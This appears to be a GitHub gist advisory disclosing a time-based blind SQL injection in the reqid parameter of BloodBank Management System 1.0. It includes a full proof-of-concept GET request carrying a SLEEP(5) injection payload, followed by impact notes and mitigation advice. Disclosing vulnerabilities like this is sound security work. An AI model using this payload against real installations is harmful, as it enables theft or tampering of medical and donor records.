Skip to content

Instantly share code, notes, and snippets.

@higordiego
Last active October 25, 2024 13:24
Show Gist options
  • Save higordiego/5f927c5e0502b4ec31b3f7ef12556942 to your computer and use it in GitHub Desktop.
Save higordiego/5f927c5e0502b4ec31b3f7ef12556942 to your computer and use it in GitHub Desktop.

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /file/accept.php?reqid=3

Vulnerability Description:

A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0. This issue occurs in the file acceptance functionality, which processes requests by hospitals or donors. The reqid parameter is not properly sanitized, allowing attackers to manipulate SQL queries and execute arbitrary database operations.

This vulnerability enables time-based blind SQL injection, where malicious SQL code forces the database to delay its response. Although no direct information is returned, the response time reveals whether the query executed successfully. This can allow attackers to:

  • Extract sensitive data by repeatedly querying the database.
  • Modify or delete database records.
  • Perform Denial of Service (DoS) by executing time-consuming operations, impacting availability.

Proof of Concept (PoC):

Below is an example of a GET request that demonstrates the time-based blind SQL injection. The query makes the database pause for 5 seconds before responding, proving that the system is vulnerable:

GET /file/accept.php?reqid=3'%20AND%20(SELECT%206479%20FROM%20(SELECT(SLEEP(5)))RvgZ)--%20MSPb HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/bloodrequest.php?msg=hospital1%20have%20logged%20in.
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive


When executed, the query causes the system to sleep for 5 seconds before returning a response, confirming that the endpoint is vulnerable to SQL injection. Attackers can use this method to extract information by adjusting query logic based on response times.


Impact:

  • Data Breach: Unauthorized access to sensitive medical and donor records.
  • Service Disruption: Delays caused by time-based queries could disrupt system availability and lead to Denial of Service (DoS).
  • Data Integrity Risks: Attackers could modify or delete critical information, such as blood request records or donor data.

Images

  • Image two
  • Image one

Mitigation Recommendations:

  1. Use Prepared Statements: Ensure that all SQL queries are parameterized to prevent injection attacks.
  2. Input Validation: Sanitize user inputs to block malicious content before executing SQL queries.
  3. Error Handling: Avoid revealing SQL errors that could help attackers refine their queries.
  4. Database Privilege Restrictions: Limit the privileges of the database user handling requests to minimize damage if compromised.
  5. Implement Rate Limiting: Limit the number of requests from a single source to mitigate DoS risks.
  6. Regular Security Audits: Conduct penetration testing and code reviews to identify and patch vulnerabilities proactively.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment